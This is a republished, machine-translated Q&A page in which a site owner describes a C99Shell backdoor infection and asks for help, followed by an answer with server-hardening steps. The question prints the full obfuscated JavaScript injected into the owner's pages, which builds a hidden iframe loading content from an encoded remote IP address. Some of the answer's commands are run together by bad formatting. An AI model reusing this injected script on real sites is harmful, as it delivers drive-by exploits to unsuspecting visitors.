从Backdoor / PHP.C99Shell又名Trojan.Script.224490保护网站

发布时间：2020-12-13 13:31:18 所属栏目：PHP教程来源：网络整理

导读：我的网站被木马脚本感染了. 有人设法创建/上传名为“x76x09.php”或“config.php”的文件到我的网站空间的根目录.其大小为44287字节,其MD5校验和为8dd76fc074b717fccfa30b86956992f8. I’ve analyzed this file using Virustotal.这些结果表明它是“Backdoor

我的网站被木马脚本感染了.

有人设法创建/上传名为“x76x09.php”或“config.php”的文件到我的网站空间的根目录.其大小为44287字节,其MD5校验和为8dd76fc074b717fccfa30b86956992f8. I’ve analyzed this file using Virustotal.这些结果表明它是“Backdoor / PHP.C99Shell”或“Trojan.Script.224490”.

此文件已在创建时执行.所以它必须自动发生.此文件将以下恶意代码添加到我的网站空间上的每个index.php的末尾.

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['x63x72x65x61x74x65x45x6cx65x6dx65x6ex74']('x69x6ex70x75x74');l['x74x79x70x65']='x68x69x64x64x65x6e';l['x76x61x6cx75x65']=j;l['x69x64']='x6a';document['x62x6fx64x79']['x61x70x70x65x6ex64x43x68x69x6cx64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['x67x65x74x45x6cx65x6dx65x6ex74x42x79x49x64']('x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['x63x72x65x61x74x65x45x6cx65x6dx65x6ex74']('x6c');l['x77x69x64x74x68']='0.1em';l['x68x65x69x67x68x74']='0.2em';l['x73x74x79x6cx65']['x62x6fx72x64x65x72']='none';l['x73x74x79x6cx65']['x64x69x73x70x6cx61x79']='none';l['x69x6ex6ex65x72x48x54x4dx4c']='x6c';l['x69x64']='x6c';document['x62x6fx64x79']['x61x70x70x65x6ex64x43x68x69x6cx64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['x67x65x74x45x6cx65x6dx65x6ex74x42x79x49x64']('x6c');var j=document['x63x72x65x61x74x65x45x6cx65x6dx65x6ex74']('x69x66x72x61x6dx65');j['x68x65x69x67x68x74']=j['x77x69x64x74x68'];j['x73x72x63']=i.i.j.i(i.i.l.i());try{l['x61x70x70x65x6ex64x43x68x69x6cx64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['x66x72x6fx6dx43x68x61x72x43x6fx64x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['x74x6fx53x74x72x69x6ex67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['x75x6ex65x73x63x61x70x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

在我的页面上显示该代码后,用户报告在Firefox中弹出一个蓝色面板.它要求他们安装一个插件.现在他们中的一些人在他们的PC上有Exploit.Java.CVE-2010-0886.a.

虽然我关闭了allow_url_fopen和allow_url_include,但确实发生了感染.我的主人说这个文件没有通过FTP上传.

所以我的问题是：

>恶意代码有什么作用？它是如何编码的？
>远程文件(“x76x09.php”或“config.php”)如何进入我的网站空间？ SQL注入？病毒在我自己的电脑上？
>我如何在未来保护我的网站免受此类攻击？

非常感谢你提前！我真的需要帮助.

This question is similar. But it’s more like a report. I didn’t know it’s a virus from the beginning. So this question here refers to the virus itself,the other question does not.

您的网站已使用 exploit code进行了黑客攻击.

>你必须更新一切,
包括你可能的任何PHP库
已安装.
>运行phpsecinfo并删除所有红色和黄色尽可能多通过修改.htaccess或php.ini中.>从所有人中删除写入权限您的Web根目录的文件和文件夹(chmod 500 -R / var / www&& chownwww-root / var / www)chown应该无论用户运行php如何做一个<？php系统('whoami');？>至想出来.>更改所有密码,并使用sftp或ftps如果可以的话.>从您的删除FILE权限你的PHP的MySQL帐户应用程序使用

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!